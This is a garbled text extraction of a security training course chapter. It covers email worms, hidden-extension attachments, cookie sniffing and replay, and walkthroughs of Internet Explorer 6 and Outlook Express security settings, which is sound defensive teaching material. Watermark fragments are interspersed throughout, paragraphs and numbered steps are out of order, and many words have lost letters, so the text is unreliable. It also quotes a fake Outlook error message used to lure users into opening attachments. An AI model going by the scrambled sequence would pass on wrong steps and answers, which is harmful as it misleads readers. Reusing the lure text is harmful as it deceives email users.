The code shown in Figure 7-12 illustrates an example of embedding scripting in Web pages. Next, we will discuss the option to embed code into email messages.
File Attachments
st
Just when the word was starting to sink in that no one should ever open an attachment from an unknown source, along came the attack of the worms. Melissa was the rst high-prole example of this new breed of attack. The attack was simplerepeat this message to everyone in your Address Book. The ILOVEYOU worm continued this method, bringing email systems to a halt again. Networks were ooded with virtually the same email message, only with different senders and receivers.
458
In
DO
ru ct
This natural desire to connect and exchange data (le attachments) is exactly what hackers can take advantage of. And, do they ever! Why bother with complicated scripting or other techniques to get a user to launch the code of choice the hard way, when it would be much easier to simply send him or her the code and have the targeted user install it? This is now the only method used by some hackers. Administrators battle this problem every minute of every day. Even though users (and administrators are also users) are instructed not to open attachments from unknown sources, they still will and do. The issue gets even more complex, however.
NO
PL
Nearly all email users have, at some point in time, used the le-attachment feature of email. To send documents to and receive documents from others quickly is one of the most important features of being connected on the Internet, and one of the reasons many people connect in the rst place.
or
IC
AT
iti
on
Since everyone is supposed to know not to open unknown attachments, how did ILOVEYOU become so effective? The answer is simpleit did not come from an unknown source. It was replicated from someone to their Address Book, meaning that they, at least casually, knew the recipients. The line kindly check the attached LOVELETTER coming from me was too much temptation for people to ignore. A different type of attachment trick, although still used, is less effective as the user base becomes more educated about attachments. This technique is to pad the real name of a le by using spaces. A le may look like it is named tonight.doc, but if one looks carefully, the associated icon is not a document icon, and there are other visual indicators to the right of the le name, such as the standard three periods in parentheses (). This indicates a longer name than tonight.doc, and is worth exploring further to see the true identify of the le. In Figure 7-13, you can see that the le name, on rst glance, says tonight.doc, but there are signs that the le is not a document. It has the executable icon, and the () would lead to the conclusion there is a long le name issue here. This le will need investigation before execution (if it even will be executed).
Ed
T DU PL IC
Figure 7-13: An example of a hidden extension.
st
This message appears normally in conjunction with errors of the MIME process. It can be just as easily used to convince users to open attachments they may not normally open. The imagination becomes the only limitation on using this.
In
DO
The nal approach to email attachments we will discuss here is to use the built-in messages Outlook has for errors and notications. The following is one of the more common ones that hackers may employ: This message uses a character set that is not supported by the Internet Service. To view the original message content, open the attached message. If the text doesnt display correctly, save the attachment to disk, and then open it using a viewer that can display the original character set.
ru ct
NO
or
AT
iti
on
Cookies
No discussion on the security of users of the Internet would be complete without a discussion on cookies. Cookies are, for now, a necessary evil. Without cookies, users of their favorite Web sites would have to continuously re-enter information. Cookies are divided into one of two types: persistent and per-session. A persistent cookie is one that stores information in a text le on the users hard drive. A per-session cookie is one that stores the needed information only during the open session, and when the browser is closed, they are no longer stored.
Disabling cookies might seem like a good idea, but most people could not use the Web to do what they want without using cookies. Using the option of Prompt Before Acceptance Of Cookies will annoy most people enough to turn off the option within the rst few minutes of browsing their favorite sites.
Ed
T DU
packet sniffer: A device or program that monitors the data travelling between computers on a network.
By using a packet sniffer tool (such as Network Monitor and Ethereal), hackers can capture the cookie as it travels on the wire. Once the cookie has been captured, it can be replayed against the target server, and the hacker can enter the Web site using his or her new identity.
st
Virtually all home users who now are enjoying their newly found high-speed access, and are leaving their computers on 24x7 to take advantage of all they can, are unaware of the increased security risks they now face. It is hard enough for full-time security administrators to get the users in their networks to follow solid security practices, so imagine the situation for the home users. If they just purchased a shiny new PC with Windows 2000 Professional loaded, why would they know to modify the Administrator account properties, or to turn on logging? Hackers around the world are, at this very moment, scanning for these systems to use at their discretion.
460
In
DO
ru ct
sniffer: A program to capture data across a computer network. Used by hackers to capture user ID names and passwords. Software tool that audits and identies network trafc packets. Is also used legitimately by network operations and maintenance personnel to troubleshoot network problems.
These thousands of people were potential targets before, but targeting a user who is only on every now and then, with a slow connection and a different IP address every time, is not the most attractive of targets. High-speed Internet access has changed all that. No longer is that potential target moving; generally, high-speed Internet connections have static IP addresses or renewed dynamic addresses. No longer is that potential target on a slow connection every now and then. Once the hacker has identied the target, he or she can be condent that the target will be there in the future and ready to respondonly a few ping packets away.
NO
PL
With the advent of high-speed, always-on Internet connections for the home user, ISPs have created a whole new playing eld for hackers. No longer are the long hours of searching for potential targets required. If a hacker is simply looking for a target to practice on, there are now thousands of targets within the hackers immediate reach.
or
IC
AT
DSL and Cable Modem Vulnerabilities
iti
In the event that a users system is compromised, a search for cookies could reveal much personal information about that user. But, it is possible to gain access to a cookie without even attempting to compromise a users system.
on
TASK 7D-1
Identifying User Vulnerabilities and Internet Security Concerns
1. Discuss, with at least one other student, the security issues surrounding users of the Internet and World Wide Web. Identify the different risk points discussed, and list the areas of greatest concern for these users. Dene what the potential counters for these risks are.
4.
or
DO NO
If you visit http://browsers.evolt.org, you will be presented with an array of browsers, many of which are in use today, including Arachne, Cello, Chimera, Grail, HotJava, IBrowse, Internet Explorer InterGo, Internet Workhorse, I-View, Lotus Notes, Lynx, Mosaic, NeoPlanet, NetCruiser, Netscape, Mozilla, Opera, Quarterdeck, Spyglass, Sesame, Tango, Teleport Pro, Voyager, WebExplorer, and WebTV, among others. There are text-based browsers, there are voice-based browsers, and there are colorful and fun browsers that you can customize to change their look and feel. But the two most debated browsers are still Internet Explorer and Netscape. The consensus is that the browser wars are over, and Netscape lostat least for the present time. Of course, its still a good product, so if youre keeping tabs, you wouldnt just write it off. Consider this: At the time of this writing, Netscape had launched version 7.0 for Windows, Macintosh, and Linux machines, and Netscapes browser engine, Gecko, was going to be integrated into parent company AOLs customized browserin effect, putting Netscape on the desktops of over 20 million users.
In
st
DU
The security setting on your browser should match your need for security or privacy and theres no cookie cutter approach to this.somewhere on www.dslreports.com.
ru ct
PL
Browser Security
IC
AT
Create a consensus on the risk points and outline them for future reference. These risk points are the same in this scenario as they are on the actual Internet.
Try to categorize the risk points of the entire scenario in order of risk. There is no denite order to them, as they are subject to opinion.
Ed
3.
Once the overall layouts of components, servers, and users have been identied, attempt to dene the potential risk points for each piece. Are the risk points for the Internet infrastructure as critical now that you can combine all the other issues versus when that was the only concern?
iti
2.
As a group, combine the topics of this lesson into a comprehensive view of the architecture of the Internet and associated risk points. Use your previous work on the physical structure of the Internet, adding potential locations of Web servers and users.
on
Setup: This is a group activity.
So what is a browser? A browser is the client-side of an application that is typically used to view Web pages hosted on a Web site, which runs the server side of the application. Of course, today you can also use a browser to download les from or upload les to a FTP server, or you can use your browser to connect to an IMAP-enabled email server to retrieve and send email.
General Settings for Internet Explorer 6

Lets look at some of the congurable options in Internet Explorer version 6, all the while concentrating on those issues that relate to its security. You will rst verify what version of IE youre running. You will then proceed to go through the steps required to congure its security settings. The following tasks are a bit different from the other tasks in the course, in that you are basically doing a walk-through of the various settings in IE so that you can better understand the implications of changing these settings. You will not actually congure any of these settings. You would, by understanding their implications, use this knowledge and perhaps use a Group Policy or the Internet Explorer Administrator Kit (IEAK) to congure robust security settings for your enterprise.
Ed
T DU
or
DO NO
462
In
st
ru ct
TASK 7D-2
1. 2. 3.
Viewing the General Settings for Your Browser

Start Internet Explorer.
Choose HelpAbout Internet Explorer. Verify that your version is 6.x, and click OK. If it is not, upgrade Internet Explorer to version 6.x, so that you can follow the rest of the steps in the following set of tasks. At the time of this writing, Microsoft had released Service Pack 1 (for IE6).
PL
IC
AT
iti
Meanwhile, Internet Explorer 6 (IE6) has been marching aheadhot xes, service packs, and alland taking over market share from earlier versions. Between these new versions of Internet Explorer and Netscape, you get more features, so you have more congurable options, which therefore translates to more headaches for network administrators.
on
The concept of a Web browser/Web server combination was thought of, experimented upon, and crystallized by Tim Berners-Lee while he worked at CERN in Switzerland. He literally invented the Web. Of course, someone else claims to have invented the Internet. Those who would like to learn more about BernersLees groundbreaking work should read his book.Weaving the Web.
4.
Right-click the Internet Explorer icon on your desktop and choose Properties. You should see the following dialog box, or one very similar to it.
Differences that you might notice include the name of the dialog box itself, and the Home Page address.
Ed
6. 7. Examine the General tab.
ru ct
st
8.
9.
In
Examine the Temporary Internet Files area. This area enables you to specify the location of the folder where your Temporary Internet Files and cookies are stored. Click Settings. First, you can specify how often IE checks for updates to locally cached content. You can leave it set to Automatically for now.
DO
You can manually type in your preferred home page in the address box provided, you can click Use Current to set the home page to the page you are currently viewing, you can click Use Default to set the home page to Microsoft.com, or you can simply click Use Blank to bring up a blank page when you launch IE.
NO
Examine the Home Page area. Here, you can set your default home page. You should keep an eye out for this, as many malicious programs attempt to set your home page to some naughty site or the other. Even some legitimate programs like to set their Web site as your home page.
DU
PL
IC
5.
Observe that there are seven tabs: General, Security, Privacy, Content, Connections, Programs, and Advanced. There are security issues related to many of these tabs, and you will step through them one at a time.
or
AT
iti
on
10. Below this, observe the current location of the Temporary Internet Files folder. By default, it is part of your user prole.
You can congure your Temporary Internet Files folder to be a RAM drive. This way, les will not be written to a physical disk.
13. Click Cancel to return to the General tab.
or
DO NO
We are done with security issues in the General tab.
Advanced Settings for Internet Explorer 6
ru ct
TASK 7D-3
1. 2. 3.
You will now look at the settings associated with the Advanced tab. Many important security settings are to be found here. The settings here are broadly divided, vertically, into Accessibility, Browsing, HTTP 1.1, Multimedia, Printing, Search, and Security. The vast majority of the settings on this tab are check boxes, meaning that they are Yes/No settings. The few settings that are not have radio-button options, so they are Either/Or settings.
st
Viewing the Advanced Settings for Your Browser

Setup: The Internet Properties dialog box is displayed. Click the Advanced tab. Scroll all the way down this list and back up again. Observe that there are many settings here. Right-click any setting, and choose Whats This? to see an explanation for that setting. Many settings, such as Disable Script Debugging and Display A Notication
464
In
DU
PL
IC
AT
14. Examine the History area. This area species how long the History folder keeps pages in history. Where is this folder? It can be found as a subfolder in your user prole, normally \Documents and Settings\username\Local Settings\History.
Ed
12. Click View Objects to see a list of ActiveX and Java controls that have been downloaded to your computer. These les are stored in the %systemroot%\Downloaded Program Files folder. Close the Explorer window to return to the Internet Options and Settings dialog boxes.
iti
11. Click View Files to see a list of les (Web pages, graphics, and cookies) that are stored in this folder. Close the Explorer window to return to the Internet Options and Settings dialog boxes.
on
You can use the slider to minimize the amount of disk space to use to 1 MB or slide the scale to allow for more space. More space means more caching, therefore a faster browsing experience, but not everyone is comfortable with leaving a lot of cached content lying around on their hard drives. You can also change the location of this folder by clicking Move Folder. If you do change this location, you must restart your computer for the changes to take effect.
About Every Script Error are useful for developers who are testing Web sites. Some settings have security implications, even though theyre in sections other than the Security section. 4. In the Browsing section, observe the Enable Install On Demand settings. This setting species that Internet Explorer or a Web page can automatically download components if a Web page needs them, in order to display the page properly or to perform a particular task. If you are running a highly secure environment, you will probably want to turn this off. Observe the Enable Third-party Browser Extensions setting. This setting allows for the use of features created by companies other than Microsoft. It does not allow you to control specic features. This is generally used as a troubleshooting tool, but it can turned off if you do not want to trust any third-party created extensions. Scroll down to the Security section. There are over a dozen settings here that directly affect the security of your browser.
5.
6. 7.
Observe the Check For Publishers Certicate Revocation setting. This setting allows you to verify the validity of software by checking to see if the software publishers certicate has been revoked or not. This box should be checked.
9.
ru ct
st
In
13. Observe the Enable Prole Assistant setting. This setting species whether you will accept a Web sites request for Prole Assistant information. Prole Assistant is set up and congured on the Content tab by clicking My Prole. 14. Observe the Use SSL 2.0 and Use SSL 3.0 settings. The choice here is simply whether you want to use the more secure SSL 3.0, or allow the use of SSL 2.0 as well. This setting depends entirely on the requirements of the enterprise.
The proles listed by Prole Assistant are shared with Outlook Express.
DO
12. Observe the Enable Integrated Windows Authentication setting. This setting allows you to choose whether or not you want to negotiate authentication or use Kerberos. Earlier versions of IE5, 5.01, and 5.5enabled Kerberos by default. Here, youre given the choice, so that you can set this according to your specic requirements.
NO
11. Observe the Empty Temporary Internet Files Folder When Browser Is Closed setting. Of course, you do want to have this box checked.
DU
10. Observe the Do Not Save Encrypted Pages To Disk setting. Information exchanged with a secure Web site is cached locally. This is encrypted information; however, for the sake of security, you do not want to have this box checked.
PL
IC
Observe the Check For Signatures On Downloaded Programs setting. This setting indicates that a programs identity will be veried by using Microsofts Authenticode technology. This box should be checked.
or
AT
8.
Observe the Check For Server Certicate Revocation setting. This setting is similar to the previous one, except that were dealing with the validity of a Web sites certicate. This box should also be checked.
Ed
iti
on
15. Observe the Use TLS 1.0 setting. Again, the decision to allow Transport Layer Security (another open security standard) depends on the requirement of the enterprise. 16. Observe the Warn About Invalid Site Certicates setting. This setting must be checked, as it will warn the user if the URL associated with a Web sites certicate is valid or not. 17. Observe the Warn If Changing Between Secure And Not Secure Mode setting. This setting warns the user if the browser is moving from a secure site (https://) to a nonsecure site (http://). Its worth keeping this checked. 18. Observe the Warn If Forms Submittal Is Being Redirected setting. This setting, if checked, warns you when you submit information at a site, but the information you submit is actually being sent to some other site. It is useful to keep this checked, as well.
Security Settings for Internet Explorer 6

The Security tab is where you will be able to use the built-in division of all networks into Local and Internet, or Trusted and Restricted zones. Each of these zones has its own broad outline of what the security level should be. If you visit a site that you have included in your Trusted zone, then this is considered a low security risk. If you are visiting some site on the Internet that you dont know much about, then this site could be considered a medium security risk, and so on. The Internet zone is a very generic zone, but with the Intranet, Trusted, and Restricted zones, you can be more explicit with respect to specifying what sites are included there. You can specify sites via their domain names or even by their specic IP addresses.
Ed
T DU
or
DO NO
In
st
ru ct
1. 2. Zone
Internet Local Intranet Trusted
TASK 7D-4
Viewing the Zone Settings for Your Browser

Setup: The Internet Properties dialog box is displayed. Click the Security tab. Observe that there are four content zones listed in the box at the top: Internet, Local Intranet, Trusted Sites, and Restricted Sites. Examine the Security Level For This Zone area. You can set the security level for each of the four zones listed. These Security Levels can be set to the default four levels represented by the sliding scale such as High, Medium, Medium-Low, and Low, or you could select Custom Level, and then go about applying specic security settings. A typical combination might be as shown in the following table: Security Level
Medium Medium-Low Low
466
PL
IC
AT
iti
on
Zone
Restricted
Security Level
High
What do these default levelsHigh, Medium, Medium-Low, and Lowmean? Lets start from lowest level and work our way to the highest level.
Medium-Low: This means that most content will be run without prompts; but unsigned ActiveX controls will not be downloaded. This security level is therefore appropriate for internal networks, such as your intranet.
Medium: This level provides a level of security similar to Medium-Low, but with additional safeguards. This security level is therefore appropriate for the Internet. High: This level represents the safest setting for the browser, but can also become very difficult to use as most of the functionality of the browser has been disabled, so many sites will not be represented well or not at all. This security level is therefore appropriate for sites that might have harmful content.
Ed
T DU PL IC
So what are the inner workings for each of these security levels anyway? Lets set the four zones to their typical default levels and work from there.
Implementing Default Security Levels for Zones
Setup: The Internet Properties dialog box is displayed, with the Security tab active. 1. 2. 3. 4. 5. 6. 7. 8. If necessary, select the Internet zone. Click the Default Level button.
Click Apply.
In
If necessary, select the Local Intranet zone. Set this level to Medium-Low. If necessary, select the Trusted Sites zone. Set this level to Low.
DO
If necessary, specify this security level to be Medium by moving the slider to the appropriate level.
st
ru ct
TASK 7D-5
NO
or
AT
iti
Low: This means that minimal safeguards and warning prompts are provided, most content is downloaded and run without prompts, and all active content can run. This security level is therefore appropriate for sites that you specically trust.
on
Default Security Settings
Default Security Settings for Internet Explorer
You could also infer that when looked at in this order, each level is a subset of the next.
9.
If necessary, select the Restricted Sites zone.
10. Set this level to High. 11. Select each zone, and verify that the slider shows the appropriate security level for each one.
The Low Security Setting
Now that you have set default security levels for the four zones, you will examine their settings. You will begin with examining the settings for Low. Note: To understand the implications of all these settings, some knowledge about Web site design is required. For instance, if you are unfamiliar with terms such as META REFRESH (which is used to redirect to another page) and IFRAME (which is used to created an inline frame for the inclusion of external objects), you might want to review Web sites such as www.htmlhelp.com and www.pageresource.com. Of course, when you are dealing with anything to do with Internet Explorer, you can also go straight to Microsofts Web site. It is a repository of information.
ru ct
2. 3. Downloads Microsoft VM Miscellaneous Scripting
Click the Custom Level button.
In the Settings dialog box, observe the long list of browser behavior settings. These are divided vertically into areas named: ActiveX Controls And Plug-ins
st
User Authentication
4.
In
Under ActiveX Controls And Plug-ins, verify the settings. They should be set to: Download Signed ActiveX Controls: Enable Download Unsigned ActiveX Controls: Prompt Initialize And Script ActiveX Controls Not Marked As Safe: Prompt Run ActiveX Controls And Plug-ins: Enable Script ActiveX Controls Marked Safe For Scripting: Enable
468
DO
NO
DU
PL
1.
Select the Trusted Sites zone. The slider should be on Low.
IC
Setup: The Internet Properties dialog box is displayed, with the Security tab active.
or
AT
Viewing Detailed Settings for the Security Level Low
TASK 7D-6
Ed
iti
on
5.
Under Downloads, verify the settings. They should be set to: File Download: Enable Font Download: Enable
6.
Under Microsoft VM, verify the setting. It should be set to:
7.
Under Miscellaneous, verify the settings. They should be set to: Access Data Sources Across Domains: Enable Allow META REFRESH: Enable Display Mixed Content: Prompt Dont Prompt For Client Certicate Selection When No Certicates Or Only One Certicate Exists: Enable Drag And Drop Or Copy And Paste Files: Enable Installation Of Desktop Items: Enable Launching Programs And Files In An IFRAME: Enable Navigate Sub-frames Across Different Domains: Enable Software Channel Permissions: Low Safety Submit Nonencrypted Form Data: Enable Userdata Persistence: Enable
Ed
T DU PL IC
9.
Allow Past Operations Via Script: Enable Scripting Of Java Applets: Enable.
10. Click Cancel to return to the Security tab.
st
In
DO
Now that you have seen what the settings are for Low, you will compare these with the settings for High. As with the previous task, where you examined the details for the Low security setting, to understand the implications of all of these settings, some knowledge about Web site design is required.
NO
The High Security Setting
ru ct
Under User Authentication, verify the setting. It should be set to: Logon: Automatic Logon With Current Username And Password
or
AT
8.
Under Scripting, verify the settings. They should be set to: Active Scripting: Enable
iti
on
Java Permissions: Low Safety
TASK 7D-7
Viewing Detailed Settings for the Security Level High
1. 2. 3.
Select the Restricted Sites zone. The slider should be on High.
Click the Custom Level button. The same categories are displayed as in the previous task.
4.
Download Unsigned ActiveX Controls: Disable Run ActiveX Controls And Plug-ins: Disable
Script ActiveX Controls Marked Safe For Scripting: Disable
Under Downloads, verify the settings. They should be set to: File Download: Disable Font Download: Prompt
Ed
T DU
Initialize And Script ActiveX Controls Not Marked As Safe: Disable
5.
6.
st
Software Channel Permissions: High Safety Submit Nonencrypted Form Data: Prompt Userdata Persistence: Disable
In
7.
Under Scripting, verify the settings. They should be set to Active Scripting: Disable Allow Paste Operations Via Script: Disable Scripting Of Java Applets: Disable
470
DO
ru ct

Allow META REFRESH: Disable Display Mixed Content: Prompt
Dont Prompt For Client Certicate Selection When No Certicates Or Only One Certicate Exists: Disable Drag And Drop Or Copy And Paste Files: Prompt Launching Programs And Files In An IFRAME: Disable Navigate Sub-frames Across Different Domains: Disable
NO
Installation Of Desktop Items: Disable
PL
Under Miscellaneous, verify the settings. They should be set to: Access Data Sources Across Domains: Disable.
IC
Under Microsoft VM, verify the setting. It should be set to: Java Permissions: Disable Java
or
AT
iti
Under ActiveX Controls And Plug-ins, verify the settings. They should be set to: Download Signed ActiveX Controls: Disable
on
8.
Under User Authentication, verify the setting. It should be set to: Logon: Prompt For Username And Password
9.
Click Cancel to return to the Security tab.
The Microsoft Virtual Machine
So, the differences between Low and High are quite obvious. While Low enables most settings and prompts for a few, High disables most settings and prompts for a few. Medium-Low and Medium lie somewhere in between. One of the settings has to do with Microsoft VM. What is Microsoft VM? It stands for Microsoft Virtual Machine and is basically a module that Microsoft introduced for implementing Java code on Windows machines. You may have noticed that one of the settings for Microsoft VM Java Permissions, apart from Low, Medium, High or Disable, is Custom. What can you do with the Custom setting?
TASK 7D-8
or
DO NO
Setup: The Internet Properties dialog box is displayed, with the Security tab active. 1. 2. 3. 4. 5. 6. 7. Select the Internet zone. Click the Custom Level button. Scroll down to Microsoft VM.
ru ct
For Java Permissions, click Custom.
Click Java Custom Settings. A dialog box with two tabsView Permissions and Edit Permissionsis displayed. Examine the View Permissions tab. Many security settings, broadly dealing with Permissions Given To Unsigned Content, Permissions That Signed Content Are Allowed, and Permissions That Signed Content Are Denied, are listed.
8. 9.
10. Right-click anywhere in this box, and observe the Permissions Help pop-up that is displayed.
In
Select the Edit Permissions tab. Observe that you can change these permissions.
st
Observe the Java Custom Settings button towards the bottom of the dialog box.
DU
PL
IC
AT
Viewing the Custom Settings for Microsoft VM (Java Settings)
Ed
iti
on
11. In the Permissions Help window, click User Directed File I/O, and read the explanation for it. 12. Close the Help window. 13. Click Cancel twice.
How to Make Best Use of These Zones
TASK 7D-9
Adding Sites to a Zone
1. 2. 3.
Select the Local Intranet zone. Click the Sites button.
or
DO NO
ru ct
4. 5. 6.
Click the ? in the upper-right corner of the dialog box. Then click each of these descriptions in turn to nd out more about the options.
Under Add This Web Site To The Zone, enter http://internalweb.scp to add a Web site. Click Add, then click OK twice. Select the Trusted Sites zone. Click the Sites button.
In
472
st
7. 8. 9.
10. Under Add This Web Site To The Zone, enter https://*.mybank.com to add a Web site. 11. Observe that Require Server Verication (https:) For All Sites In This Zone is checked.
Click the Advanced button.
DU
PL
Observe the check boxes for Include All Local (Intranet) Sites Not Listed In Other Zones, Include All Sites That Bypass The Proxy Server, and Include All Network Paths (UNCs).
IC
AT
Ed
iti
Earlier, there was a discussion on the four zones: Internet, Intranet, Trusted, and Restricted Sites. The Internet, of course, is a superset of all sites that are not on your intranet. Therefore, when you select the Internet zone, the Sites button is grayed out; however, when you select any of the other three zones, the Sites button is available for use. This enables you to explicitly specify which Web sites you want to include in the zone, and therefore the security level that applies to the specied Web sites.
on
12. Click Add, and then click OK. 13. Add, to the Restricted Sites zone, the Web site http://*.somebadsite.com.
Next, you will look at how your Web browser is congured to handle cookies. These come under the purview of privacy settings. To learn more about privacy issues on the Internet, you should visit the Platform for Privacy Preferences Project at www.w3.org/P3P.
TASK 7D-10
Viewing Cookie Handling Settings
Setup: The Internet Properties dialog box is displayed, with the Security tab active. 1. 2. 3. Click the Privacy tab.
5. 6. 7. 8.
Enter somebadsite.com, and click Block. Enter mybank.com, and click Allow.
st
Click OK.
Next, you will look at the Content tab. The Content tab enables you to control options associated with three very different sets of options. One has to do with Web site ratings, the onus of implementing this being with the Web host and the responsibility of controlling access to rated sites being with the browser. Another option has to do with certicates. The third option has to do with your Prole Assistant.
In
Content Ratings
DO
NO
Click the Edit button. This option enables you to override cookie handling for individual Web sites.
DU
4.
Click Advanced, and observe that you can override the default levels and come up with your own settings. Click Cancel.
ru ct
PL
prole: Patterns of a users activity which can detect changes in normal routines.
Slide the scale from one extreme to the other, stopping at each of the six levels. Read the descriptions for each setting. For example, the default cookie handling level for the Internet zone is Mediumthis level blocks third-party cookies that do not have a compact privacy policy, blocks thirdparty cookies that use personally identiable information without your explicit consent, and restricts rst-party cookies that use personally identiable information without implicit consent.
or
IC
AT
Observe the slider scale. It enables you to select six levels of cookie handling for the Internet Zone, from Accept All Cookies to Block All Cookies.
Ed
iti
on
Cookies
TASK 7D-11
Viewing Content Ratings
1. 2. 3.
Click the Content tab.
Observe that the settings are split into three broad divisions: Content Advisor, Certicates, and Personal Information.
5. 6. 7.
Select Nudity. Then adjust the slider from Level 0 (No Nudity) through Level 4 (Provocative Display Of Frontal Nudity). Select Sex. Then adjust the slider from Level 0 (None) through Level 4 (Explicit Sexual Activity).
Ed
T DU
4.
Select Language. Then adjust the slider from Level 0 (Inoffensive Slang) through Level 4 (Explicit Or Crude Language).
or
DO NO
Select Violence. Then adjust the slider from Level 0 (No Violence) through Level 4 (Wanton And Gratuitous Violence).
st
You can also rate your Web site when hosting it on IIS 5.0.
In
474
ru ct
TASK 7D-12
1. 2.
These ratings are presently governed by the Internet Content Rating Association (ICRA), an independent organization. For more information, please visit www.icra.org. The whole effort is voluntary on the part of the Web author, who completes an online questionnaire describing the content of the Web site. ICRA generates a content label, which is added to the site by the Web author. When a browser points to this Web site and its settings are equal to or greater than that posted on the Web site, the person is allowed to visit that site.
Configuring a Browser to Use Content Ratings

Setup: The Internet Properties dialog box is displayed, with the Content tab active, and the Content Advisor dialog box displayed.
Change the rating levels to anything you like for each of the four options presented. Click the Approved Sites tab. Here, you can enter domain names that are always allowed or never allowed, regardless of the rating.
PL
Using Content Ratings
IC
AT
iti
Under Content Advisor, click the Enable button to display a page that enables you to specify various levels of settings associated with what someone using this browser is permitted to view in relation to subjects such as language, nudity, sex, and violence (much like movie and TV ratings).
on
Setup: The Internet Properties dialog box is displayed, with the Privacy tab active.
3.
Click OK, and observe that the Create Supervisor Password dialog box is displayed. Here, you can enter a password to lock these settings into place. Enter the password 1234, and conrm it. Enter any hint you want. Click OK. Observe the pop-up informing you that Content Advisor is enabled. Click OK. Now, click Settings. Observe that you are now required to enter a password before you can continue. Click Cancel. Click Disable.
4. 5. 6. 7. 8. 9.
11. Click Cancel.
or
DO NO
Properties of the Certificates Section
1. 2.
Click the Certicates button to display the Certicates dialog box.
In
You do not have any personal certicates at this stage, nor do you have certicates from other people at this point. However, click the Intermediate and Trusted Root CAs, and observe the list of certicates that are displayed. These are certicates pre-loaded for you by Microsoft. Basically, this is a lists of all the Certicate Authorities trusted by your browser. For example, when you go to perform a transaction on an SSL-enabled Web site, if that Web site was protected by a valid certicate obtained from one of the CAs
st
Observe that there are four tabs: Personal, Other People, Intermediate CAs, and Trusted Root CAs.
Setup: The Internet Options dialog box is displayed, with the Content tab active.
DU
TASK 7D-13
ru ct
PL
IC
Next, you will take a brief look at the Certicates section and see how it is used by your browser. This is a very important section related to security and very detailed discussions and tasks dealing with implementing certicates and certicate authorities in your enterprise are dealt with in the courses that comprise Level 2 of the SCP.
AT
Certificates
Ed
10. Observe that you have to enter the password to disable the Content Rating option.
iti
on
on your list, you will know. If not, you will know that as well. 3. Click Close.
Your browser can maintain information about you personally, if you want it to. Now, you will look at the Personal Information section.
Viewing the Handling of Personal Information by a Browser
1.
Click the AutoComplete button. Based on the settings here, your browser will keep a record of things you have typed using your browser and will automatically help you out. It is up to you to determine if you want to keep this setting active.
Ed
T DU
Setup: The Internet Properties dialog box is displayed, with the Content tab active.
3.
st
When a Web site requests Prole Assistant information and if the corresponding setting is checked, then you will be asked if you want to share the prole information stored here. Click OK to close the Internet Properties dialog box.
476
In
8.
DO
ru ct
4. 5. 6. 7. Click OK.
Observe that the radio button for Create A New Entry In The Address Book To Represent Your Prole is already selected.
Click OK. You now have a prole that can be used if required.
NO
Enter a user name and an email address. You can also specify more information about yourself by using the other tabs.
PL
Click the My Prole button. If you have been using your email client, Outlook Express, you might see some entries in the Address Book. If not, you will see a gray box.
IC
2.
Click Cancel.
or
AT
If you wanted to clear the history of AutoComplete, you could also use the Clear Forms and Clear Passwords buttons.
iti
TASK 7D-14
on
Your Personal Information
Email Security
Outlook Express 6 is the email client that comes bundled with Internet Explorer 6. You can congure Outlook Express (OE) to retrieve and send mail via more than one email server. The current version also enables you to have more than one user account (identity) associated with the client. You will now look at some of the security issues surrounding this email client.
TASK 7D-15
1. 2. Double-click your Outlook Express client. If the Internet Connection Wizard is displayed, click Cancel and then click Yes to close the Wizard.
Select the Inbox, and observe that it contains a welcome message from Microsoft. When the message is highlighted, you can see a preview of that message in the pane below. As we discussed earlier, these are good intentions that can get exploited. Your rst priority should be to turn off this Preview feature. Choose ViewLayout.
Ed
T DU PL IC
3. 4. 5. 6. 7. 8. 9.
In the lower half of this dialog box, uncheck Show Preview Pane. Click OK.
Click Add. Here, you can specify specic email addresses or domain names that you want to block. Click Cancel twice.
10. Click the Security tab, and observe the conguration options.
st
You can specify that OE stay within the Restricted Sites zone.
You can congure OE to warn you if some other application tries to send email as you.
11. Click the Advanced button. You can specify encryption strengths to check for, specify to include your digital ID when sending signed messages, and check for revoked Digital IDs.
In
You can congure OE to not allow attachments to be saved or opened that could potentially be a virus (however, most organizations depend on more robust solutions on the mail servers themselves to do such scanning). You can specify that OE digitally sign and/or encrypt all outgoing messages.
DO
ru ct
If youre being spammed and you want to lter this yourself, choose ToolsMessage RulesBlocked Senders List.
NO
or
AT
iti
Basic Security Settings to Take Care of With Your Email Client
on
12. Click Cancel twice. 13. Choose FileIdentitiesAdd New Identity. Enter a name for the new identity and click OK. When you are prompted to switch to the new identity, click Yes. The Internet Connection Wizard is displayed.
15. Enter any email address for yourself, and click Next.
If you use a hotmail.com account, the steps will be slightly different than listed here.
16. Enter any mail servers address (IP address or domain name), and click Next.
18. Depending on your mail server, you may have to specify SPA. Leave it unchecked here, and click Next.
Note: Perform step 20 through step 22 only if you entered a live mail server address in step 16. 20. Select the mail server, and click Properties. 21. Click the Security tab. You can specify the strength of the encrypting algorithm to use. 22. Click Cancel, and then click Close.
Ed
T DU
19. Click Finish.
or
DO NO
Note: Perform the following step on all computers.
478
In
st
ru ct
Summary
In this lesson, we discussed the physical structure of the Internet and its components. You were introduced to terminologiessuch as NSPs, NAPs, and ISPsand technologiessuch as DNSas they relate to the Internet and security. The common attack points of the Internet were described, as were standard methods of Web hacking. You also looked at the Internet user at risk, and the methods that an attacker can use against individual users. Further, you identied browser security options in extreme detailevery single tab and option available was discussed. You also took a brief look at how to secure your email client.
PL
IC
AT
iti
17. Enter any password.
on
14. Enter any name for yourself, and click Next.
Lesson Review
7A How many Root DNS servers are there on the Internet, and in how many countries are they distributed?
In what three broad areas of activity is ICANN involved? DNS support, addressing support, and protocol support. What qualications are required for a Tier Two ISP? Tier-Two ISPs obtain their bandwidth from Tier One and have a local or regional backbone network. They have at least 50,000 subscribers and provide service at a state or national level.
7B List a few methods used by malicious attackers for targeting DNS.
DNS cache poisoning, DNS Server compromise, and DNS response spoong. What routing protocol is used on Backbone routers? BGP or Border Gateway Protocol.
What does HFNetChk from Microsoft help you do?
ru ct
HFNetChk enables you to quickly record what hot xes and/or service packs you have running on your Windows NT or 2000 machine.
Microsoft recommends that you apply the hisecweb.inf template.
st
On the Advanced tab, in the Security section.
In
Describe how you would congure your browser to trust a site. On the Security tab, select the Trusted Sites zone, click the Sites button, and add the domain name or IP address of the Web site.
DO
7D Under which tab in Internet Explorers Internet Options dialog box would you be able to congure the browser to check for publishers certicate revocation?
NO
What template is recommended by Microsoft to secure a machine that is running IIS 5.0?
DU
PL
Before vulnerabilities are classied with a CVE prex (during the research phase), they are classied with a CAN (or CANdidate) prex.
IC
7C What does the CVE mean when it uses numbers prexed with CAN?
or
AT
Most BIND versions 8.2.x were susceptible to the Lion worm. This was patched from BIND 8.2.3 and above.
